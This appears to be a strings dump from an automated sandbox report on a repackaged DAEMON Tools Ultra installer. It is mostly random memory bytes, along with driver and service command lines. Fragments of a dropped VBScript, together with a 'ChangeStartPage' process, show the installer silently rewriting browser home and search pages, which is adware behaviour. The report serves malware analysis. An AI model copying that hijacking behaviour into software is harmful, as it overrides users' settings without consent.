Free Automated Malware Analysis Service - powered by Falcon Sandbox (2023)

!!!~JJJJJEJyEJ|HH}}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!!"|JEJJJJJJH||H|}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!$=eZMlx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!//\~&'W&:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!3=:Yhu\+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!6R^`-"("

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!\Q@nE%~'vsQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!^Z=os*)"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!e]Z{}ikx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!M/WVe\9TH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!R@]~-?lW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!This program cannot be run in DOS mode.$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!zu8zG`gnP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"!]zR%g<S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"!W?"#ZCy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"$*O?x4rd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

",\#9kq5/@l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"/2GLL

Ansi based on Dropped File (Uninstall.exe.212096218)

"<['g,c++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"?G?wN)p3J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"\start72urez3kr.vbs"

Ansi based on Process Commandline (wscript.exe)

"^Qvo^s=D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"`9Scnn.b6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"C:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe"

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe"

Unicode based on Runtime Data (DiscSoftBusService.exe )

"%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe" /Service

Ansi based on Process Commandline (nsF6AA.tmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\DTAgent.exe" -shellmount "%1"

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

"%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /reg_scsi

Ansi based on Process Commandline (nsE23E.tmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /unreg_scsi

Ansi based on Process Commandline (nsCDD1.tmp)

"FWYWTPIDGKOH$

Ansi based on Dropped File (Uninstall.exe.212096218)

"monolithicSparse"

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

"xo'7/e&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"Zs+H~<1OX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

###!#!!!!!!!!!!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

##u~JJIJJIJJyyJ|}H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#%-("&#!

Ansi based on Dropped File (Uninstall.exe.212096218)

#,c'pWImd?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#.yl3|f~+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#@Ad3?Sf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#[5Eu*PAHK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#e8P?rV]{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#E}&l+2v0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#f(KCR"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#F5@XPdDI}V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#F_6S?@{&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#Fo~0+*97uv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#gEY)iZL/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#L*W!2I,@+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#Mp~YQf+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#wp>m'>*-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#y@>j=91|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#{H hZjOr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$ M:oRz}8,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$'S'yg\@;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$+S-aHIjBe

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$-m8t'DxK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$._Uq]>=s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$4FFNU

Ansi based on Dropped File (Uninstall.exe.212096218)

$5kh3)Eyl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$?}da(|OD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$^FXow[T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$`i^w63d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$A:_0kf5-CQlE+(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$D-j{=-A{(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$Function

Unicode based on Runtime Data (dtinst.exe )

$gAhALp<>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$hj?cb"o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$k[_q~%)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$o\tE8'q)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$R3>2:-Omk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$Tx~wHko

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

% !^hpx%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%&#v~IIIICIIIIIJyy|~||}}}}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%&&*.PKNNX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%02X%02X%02X%02X%02X%02X%02X%02X

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

%4qKH\l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%5?O]mjG V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%\YYYX]P^zz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%C0I-;Ra

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%DTULTRASCSIBUS.DeviceDesc% = DTULTRASCSIBUS, root\dtultrascsibus

Ansi based on Dropped File (SET4F37.tmp)

%go`*Qvw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%h x|$x9y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%l7dl*4Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%L_vWLGrGJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%ls=%ls

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%LtO9JBS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%n9mz5&}6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%s,%s;

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

%s=%s

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%u.%u%s%s

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%U;Ld@Pf26C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%V^15w~e-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%Vendor% = Vendor, NTx86

Ansi based on Dropped File (SET4F37.tmp)

%ws\Inf\%ws

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

%X),v;X*1Nw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%xE>p

Ansi based on Dropped File (imgengine.dll.62529018)

&" ?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&############!!!!!!!!!!u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&##{IICIIIIJJyJJy|||}||

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&&&&&&&&&&#############

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&'XXXXXPPndgmt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&6T+d{tS>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&:1hi'(-#p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&<_+0WZWq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&_i]+SI;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&BFh<._3zP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&E\*9/~M.FD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&ekOHnhOo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&j@nRE#{{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&mg"|sf}pD_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&MMMMMLbcgj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&Q}P@HH1x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&Z[f<;FV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'%]YXYX]Pzzop

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

')V2=9#Sv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'1lIql}XQd3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'8XkjU2Dw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

';Wq:hoi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'<5Cj;iM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'=============================================================================

Ansi based on Dropped File (start72urez3kr.vbs)

'_:_.

Ansi based on Image Processing (screen_4.png)

'cF:i484a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'grc/4KyW"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'H-n}VO0:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'i</QE/h%M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'MUHFaDGk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'OTO_O

Ansi based on Image Processing (screen_7.png)

'P^E~L_&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'RQfr!%`k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'vTypeWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

'WScript.Echo "Can't find Firefox default profile"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Firefox preference file [" & strPrefsPath & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Firefox profiles file [" & strProfilesFileName & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Mozilla Firefox"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Opera preference file [" & strPrefsPath & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't set Internet Explorer home page"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't set Internet Explorer search page"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't set Opera home page"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Firefox home page set succesfully"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Internet Explorer home page set succesfully"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Internet Explorer search page set succesfully"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Opera home page set succesfully"

Ansi based on Dropped File (start72urez3kr.vbs)

'XP#0qZV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'XXXPM^hnnp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'Y=m&nBI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

("-NR

Ansi based on Dropped File (Uninstall.exe.212096218)

(* mm&l`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(.)q%oIse]?i

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(.033668:;;=>=>><=4

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

(6VN@6vGc>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(7Yyu(>[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(@MMA!>W\yN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(aZYZY\]_^z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(cnil?N6&9#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(D6fFtf]J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(null)

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

(ou9yr@Si~L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(pb0["(91:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(PE3QZV`3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(PyW:O|ef

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(QwGr]5CTg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(S&3Qs7{A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(xL

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(|PGs4+beQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)"&KVVVZIl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)$Kmt1hGI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)&$fjYMbw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))&'&&&&&&&&&&&&&#&#####

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))))&))&'&'&&&&&&&&&&&&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)))))))))))))

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))))))))))))))'&&&(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)+)QVWVZZ]on

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)/+6^^WY\\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)3PN1xyHJ8i~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)7vExt

Ansi based on Dropped File (JSSys3.dll.204366558)

):['e\GlA|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)[F?oWg`7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)[v3kLH^nu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)F6OWuO_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)p,u%E

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

)vLo(0!bE%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

){ !x:w+X

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

){@&a$>f{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)}>}~'9YR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

* $WFVFEGiqr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*+3yI'Umw]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*.txt

Unicode based on Dropped File (JSSys3.dll.204366558)

*2}7EP.a"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*?|<>/":

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*]1W^IgPW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*_m5^S{z:O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*be'NB<e\7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*BkxQAh`A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*L,7i{$l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*V#sG)+|j

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*xa{uFla:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*{6/1J~^J`/,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+!&<!Xvdd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+#!!zIJJJJJJEJEJHHH|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+/(+?l%"KW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+?I@(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+b=+@+$j0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+bb`P```````hfaalfkllkl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+DBVU/vzPU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+ebeo`boi`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+J$0;D5rd?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+jp;T,BOZ"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+NKKKKOMOOPbPbohjq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+OP`b``````a``affahfQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+p[!8@sWJL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+r`X}:P:7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+vr-gYfw]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+xKz|b:r

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+ytn86"]}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+|,$3}_;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,$.W$N/=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,'_:_

Ansi based on Image Processing (screen_4.png)

,'Zyp,plJi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,*rS9 xZQhKU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,.I;])rxG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,0__,J

Ansi based on Image Processing (screen_7.png)

,:3BJI"^C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,;<=<122;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,=)<e;N#2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,? ?-4ved

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,_LI_K

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,G=9xC;M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,K]K24JM]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,NsX*#b]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,po,p,MMy._

Ansi based on Image Processing (screen_4.png)

,UcK_,p(3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,V~K;/Z+.Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,wu*Q[H.P)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,wVuC)39")G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,x5W#&&mt0DK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,yn,Ho,,,b,,

Ansi based on Image Processing (screen_4.png)

,|; , I\g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

- floating point support not loaded

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

- r<QlkF>M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-)ohy~@ck2t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-//>r@r^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-[ZtGcP6uX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

